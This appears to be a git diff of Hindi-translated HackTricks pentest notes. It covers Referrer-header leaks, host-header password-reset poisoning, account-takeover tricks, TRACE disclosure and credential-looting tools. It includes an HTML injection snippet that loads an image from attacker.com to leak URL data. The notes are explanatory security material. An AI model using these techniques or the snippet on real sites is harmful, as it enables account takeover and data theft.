* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर **मुझे फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PRs सबमिट करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# Referrer headers और policy
|
||||
# रेफरर हेडर्स और नीति
|
||||
|
||||
Referrer वह header है जिसका उपयोग ब्राउज़र यह इंगित करने के लिए करते हैं कि पिछला पृष्ठ कौन सा था।
|
||||
रेफरर वह हेडर है जिसका उपयोग ब्राउज़र द्वारा किया जाता है ताकि पता चले कि पिछले दौरे का कौन सा पृष्ठ देखा गया था।
|
||||
|
||||
## संवेदनशील जानकारी का लीक होना
|
||||
## संवेदनशील जानकारी लीक हो गई
|
||||
|
||||
यदि किसी वेब पेज के अंदर किसी बिंदु पर कोई संवेदनशील जानकारी GET request पैरामीटर्स पर स्थित होती है, और यदि पेज में बाहरी स्रोतों के लिंक होते हैं या एक हमलावर उपयोगकर्ता को उस URL पर जाने के लिए मना सकता है (सामाजिक इंजीनियरिंग) जो हमलावर द्वारा नियंत्रित होता है। तो वह नवीनतम GET request के अंदर संवेदनशील जानकारी को बाहर निकालने में सक्षम हो सकता है।
|
||||
यदि किसी वेब पृष्ठ के अंदर किसी GET अनुरोध पैरामीटर पर कोई संवेदनशील जानकारी होती है, यदि पृष्ठ में बाहरी स्रोतों के लिंक होते हैं या एक हमलावर उसे एक URL पर जाने के लिए मजबूर करता है/सुझाव देता है (सोशल इंजीनियरिंग), तो वह हमलावर संवेदनशील जानकारी को नवीनतम GET अनुरोध के अंदर निकाल सकता है।
|
||||
|
||||
## निवारण
|
||||
## संशोधन
|
||||
|
||||
आप ब्राउज़र को एक **Referrer-policy** का पालन करने के लिए बना सकते हैं जो संवेदनशील जानकारी को अन्य वेब एप्लिकेशन्स को भेजे जाने से **रोक** सकता है:
|
||||
आप ब्राउज़र को एक **रेफरर-नीति** का पालन करने के लिए कर सकते हैं जो संवेदनशील जानकारी को अन्य वेब एप्लिकेशनों को भेजने से **बचा** सकता है:
|
||||
```
|
||||
Referrer-Policy: no-referrer
|
||||
Referrer-Policy: no-referrer-when-downgrade
|
||||
|
@ -34,28 +35,28 @@ Referrer-Policy: strict-origin
|
|||
Referrer-Policy: strict-origin-when-cross-origin
|
||||
Referrer-Policy: unsafe-url
|
||||
```
|
||||
## प्रतिरोध-निवारण
|
||||
## काउंटर-मिटिगेशन
|
||||
|
||||
आप इस नियम को एक HTML मेटा टैग का उपयोग करके ओवरराइड कर सकते हैं (हमलावर को HTML इंजेक्शन का शोषण करने की आवश्यकता है):
|
||||
आप इस नियम को एचटीएमएल मेटा टैग का उपयोग करके ओवरराइड कर सकते हैं (हमलावर को एचटीएमएल इंजेक्शन का शोषण करना होगा):
|
||||
```markup
|
||||
<meta name="referrer" content="unsafe-url">
|
||||
<img src="https://attacker.com">
|
||||
```
|
||||
## रक्षा
|
||||
|
||||
URL में GET पैरामीटर्स या पथों के अंदर कभी भी संवेदनशील डेटा न रखें।
|
||||
कभी भी URL में GET पैरामीटर या पथ में कोई भी संवेदनशील डेटा न डालें।
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong> AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर **मुझे फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,34 +1,63 @@
|
|||
# अन्य वेब ट्रिक्स
|
||||
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और प्रैक्टिस करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और प्रैक्टिस करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family)
|
||||
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**.
|
||||
* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके अपने ट्रिक्स साझा करें**.
|
||||
* [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
### होस्ट हैडर
|
||||
### होस्ट हेडर
|
||||
|
||||
कई बार बैक-एंड **होस्ट हैडर** पर भरोसा करता है कि कुछ कार्रवाई करें। उदाहरण के लिए, यह इसका मूल्य उपयोग करके **पासवर्ड रीसेट भेजने के लिए डोमेन** के रूप में इस्तेमाल कर सकता है। तो जब आपको अपना पासवर्ड रीसेट करने के लिए एक लिंक वाला ईमेल मिलता है, तो उपयोग किया जा रहा डोमेन वही होता है जिसे आपने होस्ट हैडर में डाला है। फिर, आप अन्य उपयोगकर्ताओं के पासवर्ड रीसेट को अनुरोध कर सकते हैं और उनके पासवर्ड रीसेट कोड चुराने के लिए अपने नियंत्रण में एक डोमेन पर बदल सकते हैं। [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).
|
||||
कई बार बैक-एंड **होस्ट हेडर** पर भरोसा करता है **कुछ क्रियाएँ करने के लिए**। उदाहरण के लिए, यह अपने मान्यता को **पासवर्ड रीसेट भेजने के लिए उसका मान्यता उपयोग कर सकता है**। तो जब आप एक ईमेल प्राप्त करते हैं जिसमें अपना पासवर्ड रीसेट करने का लिंक होता है, तो उस डोमेन का उपयोग किया जा रहा है वह डोमेन है जिसे आपने होस्ट हेडर में डाला है। फिर, आप अन्य उपयोगकर्ताओं का पासवर्ड रीसेट करने का अनुरोध कर सकते हैं और उनके पासवर्ड रीसेट कोड चुरा सकते हैं। [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).
|
||||
|
||||
{% hint style="warning" %}
|
||||
ध्यान दें कि यह संभव है कि आपको उपयोगकर्ता को रीसेट पासवर्ड लिंक पर क्लिक करने की प्रतीक्षा नहीं करनी पड़े, क्योंकि शायद **स्पैम फ़िल्टर या अन्य बीचक उपकरण / बॉट इसे विश्लेषण करने के लिए क्लिक करेंगे**।
|
||||
ध्यान दें कि यह संभावित है कि आपको उपयोगकर्ता को रीसेट पासवर्ड लिंक पर क्लिक करने का इंतजार नहीं करना पड़े, क्योंकि शायद **स्पैम फ़िल्टर या अन्य बीचक उपकरण/बॉट इसे विश्लेषित करने के लिए क्लिक करेंगे**।
|
||||
{% endhint %}
|
||||
|
||||
### सत्र बूलियन
|
||||
|
||||
कभी-कभी जब आप कुछ सत्यापन सही तरीके से पूरा करते हैं, तो बैक-एंड **आपके सत्र में सुरक्षा गुणधर्म के लिए "True" के साथ एक बूलियन जोड़ देगा**। फिर, एक अलग एंडपॉइंट जानेगा कि क्या आपने उस जांच को सफलतापूर्वक पार किया है।\
|
||||
हालांकि, यदि आप **जांच पास करते हैं** और आपके सत्र को सुरक्षा गुणधर्म में "True" मान दिया जाता है, तो आप उन संसाधनों का प्रयास कर सकते हैं जो **उसी गुणधर्म पर निर्भर करते हैं** लेकिन आपको **पहुँचने की अनुमति नहीं होनी चाहिए**। [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a).
|
||||
कभी-कभी जब आप कुछ सत्यापन सही तरीके से पूरा करते हैं तो बैक-एंड **केवल एक बूलियन को "सच" के मान सुरक्षा विशेषता में आपके सत्र में जोड़ देगा**। फिर, एक विभिन्न अंतबार्ता जानेगा कि क्या आपने उस जांच को सफलतापूर्वक पार किया है।\
|
||||
हालांकि, यदि आप **जांच पास** करते हैं और आपके सत्र को सुरक्षा विशेषता में "सच" मान्यता दी जाती है, तो आप कोशिश कर सकते हैं **अन्य संसाधनों तक पहुंचने** की जो **उसी विशेषता पर निर्भर** करते हैं लेकिन आपको **पहुंचने की अनुमति नहीं** है। [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a).
|
||||
|
||||
### पंजीकरण कार्यक्षमता
|
||||
|
||||
एक पहले से मौजूदा उपयोगकर्ता के रूप में पंजीकरण करने का प्रयास करें। समानार्थक वर्णों (डॉट, बहुत सारे अंतरिक्ष और यूनिकोड) का उपयोग करने का प्रयास करें।
|
||||
कोशिश करें कि एक पहले से मौजूदा उपयोगकर्ता के रूप में पंजीकरण करें। इसके अलावा समानार्थक वर्ण भी उपयोग करने की कोशिश करें (डॉट, बहुत सारे अंतरिक्ष और यूनिकोड)।
|
||||
|
||||
### ईमेल का तबादला
|
||||
### ईमेल का अधिकार
|
||||
|
||||
एक ईमेल पंजीकरण करें, पुष्टि करने से पहले ईमेल बदलें, फिर, यदि नया पुष्टिकरण ईमेल पहले पंजीकृत ईमेल पर भेज
|
||||
एक ईमेल पंजीकरण करें, पुष्टि करने से पहले ईमेल बदलें, फिर, यदि नया पुष्टि ईमेल पहले पंजीकृत ईमेल पर भेजा जाता है, तो आप किसी भी ईमेल को अधिकार में ले सकते हैं। या यदि आप पहले वाले को दूसरे ईमेल की पुष्टि करने की अनुमति दे सकते हैं, तो आप किसी भी खाता को अधिकार में ले सकते हैं।
|
||||
|
||||
### कंपनियों के आटलासियन का आंतरिक सर्विसडेस्क तक पहुंचें
|
||||
|
||||
{% embed url="https://yourcompanyname.atlassian.net/servicedesk/customer/user/login" %}
|
||||
|
||||
### TRACE विधि
|
||||
|
||||
डेवलपर्स कई बार उत्पादन वातावरण में विभिन्न डीबगिंग विकल्पों को अक्षम करना भूल जाते हैं। उदाहरण के लिए, HTTP `TRACE` विधि निदानात्मक उद्देश्यों के लिए डिज़ाइन की गई है। यदि सक्षम है, तो वेब सर्वर उन अनुरोधों का प्रतिसाद देगा जो `TRACE` विधि का उपयोग करते हैं और प्रतिसाद में उस अनुरोध को गुणाकार में वापस भेजेगा जो प्राप्त किया गया था। यह व्यवहार अक्सर अहानिक होता है, लेकिन कभी-कभी सूचना खुलासा करता है, जैसे कि आंतरिक प्रमाणीकरण हेडरों का नाम जो अनुरोधों में प्रतिस्थापित किया जा सकता है द्वारा प्रतिस्थापित किया जा सकता है।![Image for post](https://miro.medium.com/max/60/1\*wDFRADTOd9Tj63xucenvAA.png?q=20)
|
||||
|
||||
![Image for post](https://miro.medium.com/max/1330/1\*wDFRADTOd9Tj63xucenvAA.png)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और प्रैक्टिस करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और प्रैक्टिस करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
* [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,36 +1,21 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या मुझे **Twitter** 🐦 पर **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
**DNS पर हमलों के बारे में और अध्ययन करें**
|
||||
**DNS पर हमलों के बारे में अधिक अनुसंधान करें**
|
||||
|
||||
**DNSSEC और DNSSEC3**
|
||||
|
||||
**IPv6 में DNS**
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या मुझे **Twitter** 🐦 पर **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,41 +1,28 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपोज़ में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
## **Local l00t**
|
||||
|
||||
* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): ये स्क्रिप्ट्स, PE वेक्टर्स की खोज के अलावा, फाइलसिस्टम के अंदर संवेदनशील जानकारी की खोज करेंगी।
|
||||
* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne प्रोजेक्ट** एक ओपन सोर्स एप्लिकेशन है जिसका उपयोग एक स्थानीय कंप्यूटर पर संग्रहीत बहुत सारे पासवर्ड्स को पुनः प्राप्त करने के लिए किया जाता है। प्रत्येक सॉफ्टवेयर अपने पासवर्ड्स को विभिन्न तकनीकों (plaintext, APIs, कस्टम एल्गोरिदम, डेटाबेस, आदि) का उपयोग करके संग्रहीत करता है। यह टूल सबसे अधिक प्रयुक्त सॉफ्टवेयर के लिए इन पासवर्ड्स को खोजने के उद्देश्य से विकसित किया गया है।
|
||||
|
||||
## **External Services**
|
||||
|
||||
* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): यह मॉड्यूल Confluence के API से एक्सेस टोकन का उपयोग करके कनेक्ट होगा, PDF में निर्यात करेगा, और उन Confluence दस्तावेजों को डाउनलोड करेगा जिन तक लक्ष्य की पहुँच है।
|
||||
* [**GD-Thief**](https://github.com/antman1p/GD-Thief): यह एक Red Team टूल है जो आपके (हमलावर) द्वारा पहुँच योग्य लक्ष्य के Google Drive से फाइलों को निकालने के लिए Google Drive API का उपयोग करता है। इसमें सभी साझा की गई फाइलें, साझा ड्राइव्स से सभी फाइलें, और डोमेन ड्राइव्स से सभी फाइलें शामिल हैं जिन तक लक्ष्य की पहुँच है।
|
||||
* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): यह एक Red Team टूल है जो लक्ष्य संगठन की Google People Directory को निकालने के लिए Google के People API का उपयोग करता है जिस तक आपकी पहुँच है।
|
||||
* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** यह एक Python में विकसित टूल है जो एक Slack workspace से 'रोचक' जानकारी निकालने के लिए मूल Slack APIs का उपयोग करता है, बशर्ते एक्सेस टोकन दिया गया हो।
|
||||
* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound एक कमांड लाइन टूल है जो लाल और नीली टीमों को एक Slack workspace/संगठन की त्वरित रेकी करने के लिए है। Slackhound एक संगठन के उपयोगकर्ताओं, फाइलों, संदेशों, आदि का संग्रह जल्दी से खोज योग्य बनाता है और बड़ी वस्तुओं को ऑफलाइन समीक्षा के लिए CSV में लिखा जाता है।
|
||||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपोज़ में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.
|
||||
* [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
## **स्थानीय लूट**
|
||||
|
||||
* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): ये स्क्रिप्ट, PE वेक्टर्स की खोज के अलावा, फाइल सिस्टम के अंदर संवेदनशील जानकारी की खोज करेंगे।
|
||||
